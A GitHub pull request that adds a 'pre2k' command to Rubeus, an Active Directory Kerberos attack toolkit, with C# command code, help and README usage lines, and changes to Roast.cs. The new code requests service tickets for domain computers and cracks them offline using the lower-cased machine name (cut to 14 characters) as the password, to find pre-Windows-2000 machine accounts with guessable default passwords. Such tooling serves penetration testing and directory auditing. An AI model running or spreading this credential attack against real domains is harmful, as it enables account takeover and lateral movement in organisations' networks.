### PR TITLE
Add Pre2k command

### DIFF
--- a/README.md
+++ b/README.md
@@ -56,6 +56,7 @@ Rubeus is licensed under the BSD 3-Clause license.
       - [kerberoasting opsec](#kerberoasting-opsec)
       - [Examples](#examples)
     - [asreproast](#asreproast)
+    - [pre2k](#pre2k)
   - [Miscellaneous](#miscellaneous)
     - [createnetonly](#createnetonly)
     - [changepw](#changepw)
@@ -262,7 +263,15 @@ Rubeus is licensed under the BSD 3-Clause license.
 
         Perform AS-REP "roasting" for any users without preauth using alternate credentials:
             Rubeus.exe asreproast /creduser:DOMAIN.FQDN\USER /credpassword:PASSWORD [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU,..."] [/ldaps] [/des] [/nowrap]
+	    
+    	Identify Pre-2k machine accounts, by performing TGS-REP ""roasing"" for all domain computers:
+    	    Rubeus.exe pre2k [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:""OU=,...""] [ldapfilter:LDAP_FILTER] [/ldaps] [/randomspn] [/verbose] [/outfile:pre2k.txt]
 
+    	Identify Pre-2k machine accounts, by performing TGS-REP ""roasing"" for specific computers:
+    	    Rubeus.exe pre2k <computers:comp1,comp2,comp3 | /computers:C:\Temp\computers.txt> [/service:host] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/verbose] [/outfile:pre2k.txt] 
+     
+    	Identify Pre-2k machine accounts, by performing TGS-REP ""roasing"" for all domain computers using alternate credentials:
+    	    Rubeus.exe pre2k /creduser:DOMAIN.FQDN\USER /credpassword:PASSWORD [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:""OU=,...""] [ldapfilter:LDAP_FILTER] [/ldaps] [/randomspn] [/verbose] [/outfile:pre2k.txt]
 
      Miscellaneous:
 
@@ -3007,6 +3016,7 @@ Breakdown of the roasting commands:
 | ----------- | ----------- |
 | [kerberoast](#kerberoast) | Perform Kerberoasting against all (or specified) users |
 | [asreproast](#asreproast) | Perform AS-REP roasting against all (or specified) users |
+| [pre2k](#pre2k) | Identify Pre2k computers by performing TGS-REP roasting against all (or specified) machine accounts |
 
 
 ### kerberoast
@@ -3512,6 +3522,8 @@ AS-REP roasting users in a foreign non-trusting domain using alternate credentia
     [*] AS-REP hash:
 
         $krb5asrep$david@external.local:9F5A33465C53056F17FEFDF09B7D36DD$47DBAC3...(snip)...
+
+### pre2k
 
 
 ## Miscellaneous

--- a/Rubeus/Commands/Pre2k.cs
+++ b/Rubeus/Commands/Pre2k.cs
@@ -1,0 +1,190 @@
+﻿using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Text.RegularExpressions;
+using System.Threading.Tasks;
+
+namespace Rubeus.Commands
+{
+    public class Pre2k : ICommand
+    {
+        public static string CommandName => "pre2k";
+
+        public void Execute(Dictionary<string, string> arguments)
+        {
+            Console.WriteLine("\r\n[*] Action: Identify Pre2K machine accounts\r\n");
+
+            List<string> computers = new List<string>();
+            string outFile = "";
+            string domain = "";
+            string dc = "";
+            string OU = "";
+            string service = "HOST";
+            string ldapFilter = "";
+            KRB_CRED TGT = null;
+            int resultLimit = 0;
+            int delay = 0;
+            int jitter = 0;
+            bool ldaps = false;
+            bool enterprise = false;
+            bool randomspn = false;
+            bool verbose = false;
+            System.Net.NetworkCredential cred = null;
+
+            if (arguments.ContainsKey("/computer"))
+            {
+                computers.Add(arguments["/computer"]);
+            }
+            if (arguments.ContainsKey("/computers"))
+            {
+                
+                if (System.IO.File.Exists(arguments["/computers"]))
+                {
+                    string fileContent = Encoding.UTF8.GetString(System.IO.File.ReadAllBytes(arguments["/computers"]));
+                    foreach (string s in fileContent.Split('\n'))
+                    {
+                        if (!String.IsNullOrEmpty(s))
+                        {
+                            computers.Add(s.Trim());
+                        }
+                    }
+                }
+                else
+                {
+                    foreach (string s in arguments["/computers"].Split(','))
+                    {
+                        computers.Add(s);
+                    }
+                }
+            }
+            if (arguments.ContainsKey("/domain"))
+            {
+                // roast users from a specific domain
+                domain = arguments["/domain"];
+            }
+            if (arguments.ContainsKey("/dc"))
+            {
+                // use a specific domain controller for kerberoasting
+                dc = arguments["/dc"];
+            }
+            if (arguments.ContainsKey("/ou"))
+            {
+                // roast users from a specific OU
+                OU = arguments["/ou"];
+            }
+            if (arguments.ContainsKey("/service"))
+            {
+                service = arguments["/service"];
+            }
+            if (arguments.ContainsKey("/outfile"))
+            {
+                // save output to a file
+                outFile = arguments["/outfile"];
+            }
+            if (arguments.ContainsKey("/ticket"))
+            {
+                // use an existing TGT ticket when requesting/roasting
+                string kirbi64 = arguments["/ticket"];
+
+                if (Helpers.IsBase64String(kirbi64))
+                {
+                    byte[] kirbiBytes = Convert.FromBase64String(kirbi64);
+                    TGT = new KRB_CRED(kirbiBytes);
+                }
+                else if (System.IO.File.Exists(kirbi64))
+                {
+                    byte[] kirbiBytes = System.IO.File.ReadAllBytes(kirbi64);
+                    TGT = new KRB_CRED(kirbiBytes);
+                }
+                else
+                {
+                    Console.WriteLine("\r\n[X] /ticket:X must either be a .kirbi file or a base64 encoded .kirbi\r\n");
+                }
+            }
+            if (arguments.ContainsKey("/ldapfilter"))
+            {
+                // additional LDAP targeting filter
+                ldapFilter = arguments["/ldapfilter"].Trim('"').Trim('\'');
+            }
+            if (arguments.ContainsKey("/resultlimit"))
+            {
+                // limit the number of roastable users
+                resultLimit = Convert.ToInt32(arguments["/resultlimit"]);
+            }
+            if (arguments.ContainsKey("/delay"))
+            {
+                delay = Int32.Parse(arguments["/delay"]);
+                if (delay < 100)
+                {
+                    Console.WriteLine("[!] WARNING: delay is in milliseconds! Please enter a value > 100.");
+                    return;
+                }
+            }
+            if (arguments.ContainsKey("/jitter"))
+            {
+                try
+                {
+                    jitter = Int32.Parse(arguments["/jitter"]);
+                }
+                catch
+                {
+                    Console.WriteLine("[X] Jitter must be an integer between 1-100.");
+                    return;
+                }
+                if (jitter <= 0 || jitter > 100)
+                {
+                    Console.WriteLine("[X] Jitter must be between 1-100");
+                    return;
+                }
+            }
+            if (arguments.ContainsKey("/ldaps"))
+            {
+                ldaps = true;
+            }
+            if (arguments.ContainsKey("/enterprise"))
+            {
+                enterprise = true;
+            }
+            if (arguments.ContainsKey("/randomspn"))
+            {
+                randomspn = true;
+            }
+            if (arguments.ContainsKey("/verbose"))
+            {
+                verbose = true;
+            }
+            if (String.IsNullOrEmpty(domain))
+            {
+                // try to get the current domain
+                domain = System.DirectoryServices.ActiveDirectory.Domain.GetCurrentDomain().Name;
+            }
+            if (arguments.ContainsKey("/creduser"))
+            {
+                // provide an alternate user to use for connection creds
+                if (!Regex.IsMatch(arguments["/creduser"], ".+\\.+", RegexOptions.IgnoreCase))
+                {
+                    Console.WriteLine("\r\n[X] /creduser specification must be in fqdn format (domain.com\\user)\r\n");
+                    return;
+                }
+
+                string[] parts = arguments["/creduser"].Split('\\');
+                string domainName = parts[0];
+                string userName = parts[1];
+
+                // provide an alternate password to use for connection creds
+                if (!arguments.ContainsKey("/credpassword"))
+                {
+                    Console.WriteLine("\r\n[X] /credpassword is required when specifying /creduser\r\n");
+                    return;
+                }
+
+                string password = arguments["/credpassword"];
+
+                cred = new System.Net.NetworkCredential(userName, password, domainName);
+            }
+
+            Roast.Pre2kRoast(computers, service, domain, dc, OU, cred, outFile, TGT, ldapFilter, resultLimit, delay, jitter, ldaps, enterprise, randomspn, verbose);
+        }
+    }
+}

--- a/Rubeus/Domain/CommandCollection.cs
+++ b/Rubeus/Domain/CommandCollection.cs
@@ -47,6 +47,7 @@ namespace Rubeus.Domain
             _availableCommands.Add(Preauthscan.CommandName, () => new Preauthscan());
             _availableCommands.Add(ASREP2Kirbi.CommandName, () => new ASREP2Kirbi());
             _availableCommands.Add(Kirbi.CommandName, () => new Kirbi());
+			_availableCommands.Add(Pre2k.CommandName, () => new Pre2k());
         }
 
         public bool ExecuteCommand(string commandName, Dictionary<string, string> arguments)

--- a/Rubeus/Domain/Info.cs
+++ b/Rubeus/Domain/Info.cs
@@ -198,6 +198,15 @@ namespace Rubeus.Domain
     Perform AES AS-REP ""roasting"":
         Rubeus.exe asreproast [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:""OU=,...""] /aes [/ldaps] [/nowrap]
 
+    Identify Pre-2k machine accounts, by performing TGS-REP ""roasing"" for all domain computers:
+    	Rubeus.exe pre2k [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:""OU=,...""] [ldapfilter:LDAP_FILTER] [/ldaps] [/randomspn] [/verbose] [/outfile:pre2k.txt]
+
+    Identify Pre-2k machine accounts, by performing TGS-REP ""roasing"" for specific computers:
+    	Rubeus.exe pre2k <computers:comp1,comp2,comp3 | /computers:C:\Temp\computers.txt> [/service:host] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/verbose] [/outfile:pre2k.txt] 
+     
+    Identify Pre-2k machine accounts, by performing TGS-REP ""roasing"" for all domain computers using alternate credentials:
+    	Rubeus.exe pre2k /creduser:DOMAIN.FQDN\USER /credpassword:PASSWORD [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:""OU=,...""] [ldapfilter:LDAP_FILTER] [/ldaps] [/randomspn] [/verbose] [/outfile:pre2k.txt]
+
 
  Miscellaneous:
 

--- a/Rubeus/Rubeus.csproj
+++ b/Rubeus/Rubeus.csproj
@@ -93,6 +93,7 @@
     <Compile Include="Commands\Kerberoast.cs" />
     <Compile Include="Commands\Klist.cs" />
     <Compile Include="Commands\Monitor.cs" />
+	<Compile Include="Commands\Pre2k.cs" />
     <Compile Include="Commands\Preauthscan.cs" />
     <Compile Include="Commands\Ptt.cs" />
     <Compile Include="Commands\Purge.cs" />

--- a/Rubeus/lib/Roast.cs
+++ b/Rubeus/lib/Roast.cs
@@ -1120,7 +1120,7 @@ namespace Rubeus
                 }
             
                 // build LDAP query
-                string userSearchFilter = "(&(samAccountType=805306369)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))";
+                string userSearchFilter = "(&(samAccountType=805306369)(serviceprincipalname=*)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))";
                 if (!String.IsNullOrEmpty(ldapFilter))
                 {
                     userSearchFilter = String.Format("(&{0}({1}))", userSearchFilter, ldapFilter);

--- a/Rubeus/lib/Roast.cs
+++ b/Rubeus/lib/Roast.cs
@@ -1207,9 +1207,15 @@ namespace Rubeus
             
             byte[] cipherText = TGS.tickets[0].enc_part.cipher;
             int encType = TGS.tickets[0].enc_part.etype;
-
-            if (CrackTGS(cipherText, encType, hostname, domain, hostname.ToLower())) {
-                string message = String.Format("[=] Found password of {0} -> {1}", hostname, hostname.ToLower());
+	    string password = hostname.ToLower();
+	    // if account name is over 14 characters, the password should be the first 14 characters only
+	    // due to the old windows hashing algorithms compatibility
+	    if (hostname.Length > 14)
+	    {
+		password = hostname.ToLower().Substring(0, 14);
+	    }
+            if (CrackTGS(cipherText, encType, hostname, domain, password)) {
+                string message = String.Format("[=] Found password of {0} -> {1}", hostname, password);
                 Console.WriteLine(message);
                 if (!String.IsNullOrEmpty(outFile))
                 {
@@ -1298,9 +1304,16 @@ namespace Rubeus
                                     if (elem3.TagValue == 2)
                                     {
                                         byte[] cipherText = elem3.Sub[0].GetOctetString();
-                                        if (CrackTGS(cipherText, (int)encType, hostname, domain, hostname.ToLower()))
+					string password = hostname.ToLower();
+					// if account name is over 14 characters, the password should be the first 14 characters only
+					// due to the old windows hashing algorithms compatibility
+					if (hostname.Length > 14)
+					{
+					    password = hostname.ToLower().Substring(0, 14);	
+					}
+                                        if (CrackTGS(cipherText, (int)encType, hostname, domain, password))
                                         {
-                                            string message = String.Format("[=] Found password of {0} -> {1}", hostname, hostname.ToLower());
+                                            string message = String.Format("[=] Found password of {0} -> {1}", hostname, password);
                                             Console.WriteLine(message);
                                             if (!String.IsNullOrEmpty(outFile))
                                             {
@@ -1349,7 +1362,7 @@ namespace Rubeus
 
         public static bool CrackTGS(byte[] cipherText, int encType, string hostname, string domain, string password)
         {
-            string salt = String.Format("{0}{1}", domain.ToUpper(), hostname);
+            string salt = String.Format("{0}host{1}.{2}", domain.ToUpper(), hostname.ToLower(), domain.ToLower());
             string hash;
             byte[] key;
             Interop.KERB_ETYPE tgsEType;

--- a/Rubeus/lib/Roast.cs
+++ b/Rubeus/lib/Roast.cs
@@ -8,6 +8,12 @@ using System.DirectoryServices;
 using System.DirectoryServices.AccountManagement;
 using System.Collections.Generic;
 using Rubeus.lib.Interop;
+using static Rubeus.Interop;
+using System.DirectoryServices.ActiveDirectory;
+using System.Xml.Linq;
+using Rubeus.Commands;
+using System.IdentityModel.Protocols.WSTrust;
+using System.Security.Policy;
 
 namespace Rubeus
 {


### PR DESCRIPTION
this command can be used to hunt pre-windows 2000 computer objects.

it ask TGS for each machine, and try to decrypt it with empty password or the machine name in lower case.

Example usage in my lab:
![image](https://github.com/GhostPack/Rubeus/assets/53706099/1a069527-6e61-46e3-9b31-1e60f88243b0)
